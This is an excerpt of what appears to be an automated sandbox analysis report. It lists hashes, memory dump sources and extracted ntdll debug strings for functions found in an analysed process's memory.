                                                                        • Instruction ID: ce03022e0ea09051aacd547d66f00eb40ef948a83c02fb7396a0c94ec5fc2f7d
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: A5D0C93A617E80CFC216CB88C5A8F4533B4BB84B84FC184D0E401CBB32E62CED40CA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: 45219853a2c25db8b10013f7605b26ae61cab146e27584619287ada4eae91f47
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: 3BC01233190644AFD7129A94CD41F4177A9E798B40F004021F20447570C535E810D644
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: e507de36fc09a8bf6457d49ce9ee90d2aebe41d728ac9fc06023e061d16fdc2c
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 10D01236110248EFCB02DF85D890E9A772AFBD8B10F108419FD19076108A35FD62DA50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: 7d1c296935031e68258c085824cb6bd9acb7f67b3638afe4ead511bac44a1e14
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: FFC002756415418BDF15CA5AD294B4577F4B744745F158890E8058B722E628E901CA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2b316a7317f7298b790f63c1dd5f8fb31aeee4bbb39e562508635c129402b73
                                                                        • Instruction ID: 677f201669a4062646810ca6630453a539e7e10a9871e3a5966323b9b47f53b6
                                                                        • Opcode Fuzzy Hash: f2b316a7317f7298b790f63c1dd5f8fb31aeee4bbb39e562508635c129402b73
                                                                        • Instruction Fuzzy Hash: 5190022160184442D25072994C44B0F410547F5202F95C01FA4157554CC91989559B31
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a056ae075fd2e98869267d8a0afded01fc91ea30cc139adb9c529cbe2082cdb
                                                                        • Instruction ID: cff6daf96994e9039f2fd9ae5e42f8ccbf060008ff1065b19305dd52b0f901f4
                                                                        • Opcode Fuzzy Hash: 6a056ae075fd2e98869267d8a0afded01fc91ea30cc139adb9c529cbe2082cdb
                                                                        • Instruction Fuzzy Hash: A190022164140802D25071998854707000687E4601F55C017A0025554D861A8A65AAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b40754ff4f1ffe387ebdb17b7e7d0948df526aa40f61acb18d6865ced93985db
                                                                        • Instruction ID: 5b82e62594923dff4cfafdd0a455d79bebc25b8a37f986b3a4feffc6b62de137
                                                                        • Opcode Fuzzy Hash: b40754ff4f1ffe387ebdb17b7e7d0948df526aa40f61acb18d6865ced93985db
                                                                        • Instruction Fuzzy Hash: FA900231A0580012925071994CC4546400557F4301B55C017E0425554C8A188A569771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6712d1a0913ac71434a6dd44afdb74c29f6366f7b83de0f885c2595f676364a8
                                                                        • Instruction ID: d6c397b366356d851229ba9b7278966255d05cfb04878533151e9a7777bdc8eb
                                                                        • Opcode Fuzzy Hash: 6712d1a0913ac71434a6dd44afdb74c29f6366f7b83de0f885c2595f676364a8
                                                                        • Instruction Fuzzy Hash: A8900261A0150042425071994C44406600557F5301395C11BA0555560C861C8955D679
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2bb77e00aa0df1bd81be79a723385354eaf15744118ed7463f225cfe68c3abfd
                                                                        • Instruction ID: 743f6c3f771d2f89f12fc8546bfe58f2d07f39659d9339e5bf9e68015d04881e
                                                                        • Opcode Fuzzy Hash: 2bb77e00aa0df1bd81be79a723385354eaf15744118ed7463f225cfe68c3abfd
                                                                        • Instruction Fuzzy Hash: A4900225611400030215B5990B44507004647E9351355C027F1016550CD62589619531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9192c4f7fe97ff460857f6c8ff4104a37b84c7e841bfaf8fbb55e2ae5a42928c
                                                                        • Instruction ID: 32949eb27b5eb04c7e6877d3d845c293477448a4336708c2c4ca3a99e226f1a8
                                                                        • Opcode Fuzzy Hash: 9192c4f7fe97ff460857f6c8ff4104a37b84c7e841bfaf8fbb55e2ae5a42928c
                                                                        • Instruction Fuzzy Hash: EC900225621400020255B5990A4450B044557EA351395C01BF1417590CC62589659731
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dddb114835f2f9b3ec31942561f3e8aa92218c6a868e3e4ccef1b990006dea0b
                                                                        • Instruction ID: 28b4618ad4b884f201d9499f79fac1a323dbb472bee3297b13eaf325b3352b76
                                                                        • Opcode Fuzzy Hash: dddb114835f2f9b3ec31942561f3e8aa92218c6a868e3e4ccef1b990006dea0b
                                                                        • Instruction Fuzzy Hash: 109002A1601540924610B2998844B0A450547F4201B55C01BE1055560CC5298951D535
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00de5891e8b1a63cf80539e61d26b42733565671f4b4afecba0640c228be9254
                                                                        • Instruction ID: 80ec724d558830ae3aabe78c18a4a49dcf3355973400a022a3517ad85c89f53d
                                                                        • Opcode Fuzzy Hash: 00de5891e8b1a63cf80539e61d26b42733565671f4b4afecba0640c228be9254
                                                                        • Instruction Fuzzy Hash: 6690026160240003421571994854616400A47F4201B55C027E1015590DC5298991A535
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09e0b30b0e0e91085cd7a8bd7d4a40e5ccb6d679ac90b77e58e07f15c39d294c
                                                                        • Instruction ID: cdb15a5865e3b33af5b7bfbafc4e1cc0ffccf9ebad6b2865418b7760054f45a2
                                                                        • Opcode Fuzzy Hash: 09e0b30b0e0e91085cd7a8bd7d4a40e5ccb6d679ac90b77e58e07f15c39d294c
                                                                        • Instruction Fuzzy Hash: 6790023160544842D25071994844A46001547E4305F55C017A0065694D96298E55FA71
                                                                        Control-flow Graph
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: ebc17332ec561b29d670f1ae4dbe40deb4b081a7d7d18ae54461c15832305fc8
                                                                        • Instruction ID: 006f64c0cb95cae736f425c39c1ec82dff0cc266a405bcc7e4afaff34d00d42c
                                                                        • Opcode Fuzzy Hash: ebc17332ec561b29d670f1ae4dbe40deb4b081a7d7d18ae54461c15832305fc8
                                                                        • Instruction Fuzzy Hash: 4551DAB2A001167FCB10DBDC89E0A7EF7B8BB29605B20C269E854D7741D23CDF5097A1
                                                                        Control-flow Graph
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: d5bad69e4f2a40fcaf21727d09b603838a89091800c989ba2309c35a3988953b
                                                                        • Instruction ID: 2c1912442083e968500a30501b0314d1bfb57f74ca0701889c346247c52deb19
                                                                        • Opcode Fuzzy Hash: d5bad69e4f2a40fcaf21727d09b603838a89091800c989ba2309c35a3988953b
                                                                        • Instruction Fuzzy Hash: 0051F475A00645AEEB24DFD8C8D097EFFF9EB44205B10C859E495C7642E6B8EE90CF60
                                                                        Control-flow Graph
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: HEAP:
                                                                        • API String ID: 3446177414-2466845122
                                                                        • Opcode ID: 7a152a97c11702bb403a68eb54c3556990b5e9951d1ec0586677a21a80eef5c9
                                                                        • Instruction ID: 1d12485d620d63a3263b9cd79c48af93202cb73c61147d21b21d14674047f967
                                                                        • Opcode Fuzzy Hash: 7a152a97c11702bb403a68eb54c3556990b5e9951d1ec0586677a21a80eef5c9
                                                                        • Instruction Fuzzy Hash: 31A18872A046128FC705CF68C890A1ABBE5FF88750F15496DFA45DB321EB34ED42CB91
                                                                        Control-flow Graph
                                                                        Strings
                                                                        • Actx , xrefs: 204C7A0C, 204C7A73
                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 204C79D5
                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 204C79FA
                                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 204C7AE6
                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 204C79D0, 204C79F5
                                                                        • SsHd, xrefs: 2047A3E4
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                        • API String ID: 0-1988757188
                                                                        • Opcode ID: c55021c1d25380bbc56e3bcb1ab4f73e699cdbbf1cb1a22c7faea28e578c135a
                                                                        • Instruction ID: ed9c0e71df2d69be1600eb48a25191d3cec9bc780e615c4e6f327edaa1ae6643
                                                                        • Opcode Fuzzy Hash: c55021c1d25380bbc56e3bcb1ab4f73e699cdbbf1cb1a22c7faea28e578c135a
                                                                        • Instruction Fuzzy Hash: 05E1AE716043028FD714CFA4C884B9AB7F5BBC4254F14CA2EE9A5CB3A1D73ADD558B82
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204B9AC5, 204B9B06
                                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 204B9AB4
                                                                        • LdrpLoadShimEngine, xrefs: 204B9ABB, 204B9AFC
                                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 204B9AF6
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-3589223738
                                                                        • Opcode ID: d365ea16fc101d859487da7b554b27cff087e648c4132e3e31f80ccd7c8a2e05
                                                                        • Instruction ID: 23466e3e4aaca5035462685aa611f8971b78970e3b5994cd3549d613da3acf4a
                                                                        • Opcode Fuzzy Hash: d365ea16fc101d859487da7b554b27cff087e648c4132e3e31f80ccd7c8a2e05
                                                                        • Instruction Fuzzy Hash: F1514372A142589FCB04DBECCC95F9D7FB2BB64708F008129E544AB2A5DB7CAD44DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 2050F263
                                                                        • Entry Heap Size , xrefs: 2050F26D
                                                                        • ---------------------------------------, xrefs: 2050F279
                                                                        • HEAP: , xrefs: 2050F15D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                        • API String ID: 3446177414-1102453626
                                                                        • Opcode ID: 654d699d6877fb674dacd14a0b40df8dc52f93f5c245c31149424b11956be0f3
                                                                        • Instruction ID: e66cf6106b33c44b117729515e840b2294726a0e286d3e9c386a5961ecdfd13e
                                                                        • Opcode Fuzzy Hash: 654d699d6877fb674dacd14a0b40df8dc52f93f5c245c31149424b11956be0f3
                                                                        • Instruction Fuzzy Hash: 40417A39A14616DFC704CFA8C884A09BFF6EF9D358725C16AD408AB621D735ED42DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $$@
                                                                        • API String ID: 3446177414-1194432280
                                                                        • Opcode ID: 7327d471bd5b7a9ff266f362f4be85fad9d538a2c5ca2050ae358d9bab3109cf
                                                                        • Instruction ID: c118cb16050f6b97d2691d5f55b1278607368be260a86409fa28371d9370bf0f
                                                                        • Opcode Fuzzy Hash: 7327d471bd5b7a9ff266f362f4be85fad9d538a2c5ca2050ae358d9bab3109cf
                                                                        • Instruction Fuzzy Hash: 77817275D002699BDB25CF94CD45BDEB7B8AF08744F0081DAEA19B7240E7789E84CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 0764d9cd29f262a581f0beeef91862a226e0d4f70531fb459b3dd3d44199da72
                                                                        • Instruction ID: c2aafec3af3c393779e2a52a36e20a0eae4232b9b0a64ffc8ae2ce962563f12f
                                                                        • Opcode Fuzzy Hash: 0764d9cd29f262a581f0beeef91862a226e0d4f70531fb459b3dd3d44199da72
                                                                        • Instruction Fuzzy Hash: 8F2192B6E00119ABDB00DFF9CC40AEEBBF8EF58644F44411AE904E3200E734DA51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: dc24a9fd847ea73ee3b446913206f66de249a204c685ffae3fcb51b1eb667c13
                                                                        • Instruction ID: 2f54f6ffcbcd966e1421363bfc30ef1578988e5143f6251f963f1a4f29e35407
                                                                        • Opcode Fuzzy Hash: dc24a9fd847ea73ee3b446913206f66de249a204c685ffae3fcb51b1eb667c13
                                                                        • Instruction Fuzzy Hash: 2E316672A00519AFDB10CF69CC41BEEBBF8FB54614F404959E959E3240EB34EE958FA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 1ac40b8bd5775d796214b3689517f1f142910927d98f847b413d0bdb1202f367
                                                                        • Instruction ID: d1f948161f5ebbdadc3823a54ceb53266d95d83cc9141ce65960e893009ff8a5
                                                                        • Opcode Fuzzy Hash: 1ac40b8bd5775d796214b3689517f1f142910927d98f847b413d0bdb1202f367
                                                                        • Instruction Fuzzy Hash: A4514C35704A129FDF08CF98C9A5A197BF1FB89210F24456DEA06CB761DB78ED41DB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 18f9a5f33a2e8f717475ae21b31c0e72dc2e4f4244fd9528d572a720ca379c3c
                                                                        • Instruction ID: 6856f51bc2f4f1b63d333d42a1606b61ac274c4468c82417064cc05eb56e0357
                                                                        • Opcode Fuzzy Hash: 18f9a5f33a2e8f717475ae21b31c0e72dc2e4f4244fd9528d572a720ca379c3c
                                                                        • Instruction Fuzzy Hash: C15132B2E002299FDF18CFD8C855ACCBBB1BF48354F15826AE905AB350D339A901CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%